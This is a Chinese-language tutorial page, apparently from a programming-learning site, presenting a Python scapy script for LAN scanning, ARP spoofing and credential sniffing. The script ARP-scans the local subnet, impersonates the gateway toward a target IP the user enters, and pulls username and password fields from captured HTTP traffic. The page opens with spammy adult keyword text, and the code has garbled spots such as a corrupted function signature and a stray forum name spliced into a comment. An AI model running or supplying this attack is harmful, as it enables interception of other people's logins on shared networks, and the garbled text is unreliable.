亚洲在线久爱草,狠狠天天香蕉网,天天搞日日干久草,伊人亚洲日本欧美

為了賬號安全,請及時綁定郵箱和手機立即綁定

Python 實現局域網掃描,抓包獲取密碼

標簽:
MongoDB

#局域网段扫描,抓包获取密码

import time

import re

import os

from scapy.all import *

from threading import Thread

#定义变量函数

wifi=‘RNDIS’

rtable=os.popen(‘route print’).read()

print(rtable)

#注意将列表转为字符串

getway=re.findall(r’0.0.0.0\s+0.0.0.0\s+(\S+)\s’,rtable)[0]

print(getway)

#局域网扫描

def scan():

#SR()函数用来来发送数据包和接收响应,他会返回两个列表数据,一个是answer list 另一个是unanswered list

#公式:pack=Ether(src=攻击者MAC地址,dst=目标MAC地址)/ARP(hwsrc=攻击者MAC地址,psrc=要假装谁就是谁的IP地址,hwdst=目标富贵论坛MAC地址,pdst=目标IP地址,op=2)

ans,unans=srp(Ether(dst=‘ff:ff:ff:ff:ff:ff’)/ARP(pdst=getway+’/24’),timeout=1)

print(‘一共扫描到%d个主机:’%len(ans))

for i in ans:

print(i)

for a in unans:

print(a)

#找用户名和密码

def paw§:

try:

if p.haslayer(Raw):

ss=p.load.decode()

result=re.findall(r’userName=(.+)&passWord=(.+)’,ss)

if result:

print(‘user:’,result[0][0])

print(‘pass:’,result[0][1])

except:

pass

print(sniff(count=100, iface=“RNDIS”))

#抓包

def capture(tip,tcap):

#冒充自己为网关

pkts=sniff(iface=wifi,timeout=tcap,filter=‘tcp port 80 and src host %s’%tip,prn=paw)

return pkts

#arp欺骗攻击

def arpspoof(tip,tcap):

t=Thread(target=capture,args=(tip,tcap))

t.start()

for i in range(tcap*5):

sendp(Ether(dst=‘ff:ff:ff:ff:ff:ff’)/ARP(pdst=target,psrc=getway))

time.sleep(0.2)

print(‘结束’)

if name==‘main’:

scan()

target=input(‘输入要攻击的ip地址:’).strip()

tl=int(input(‘输入要准备攻击的时间:’).strip())

arpspoof(target,tl)

print(‘攻击结束!’)

Python 实现局域网扫描,抓包获取密码

點擊查看更多內容
TA 點贊

若覺得本文不錯,就分享一下吧!

評論

作者其他優質文章

正在加載中
  • 推薦
  • 評論
  • 收藏
  • 共同學習,寫下你的評論
感謝您的支持,我會繼續努力的~
掃碼打賞,你說多少就多少
贊賞金額會直接到老師賬戶
支付方式
打開微信掃一掃,即可進行掃碼打賞哦
今天注冊有機會得

100積分直接送

付費專欄免費學

大額優惠券免費領

立即參與 放棄機會
微信客服

購課補貼
聯系客服咨詢優惠詳情

幫助反饋 APP下載

慕課網APP
您的移動學習伙伴

公眾號

掃描二維碼
關注慕課網微信公眾號

舉報

0/150
提交
取消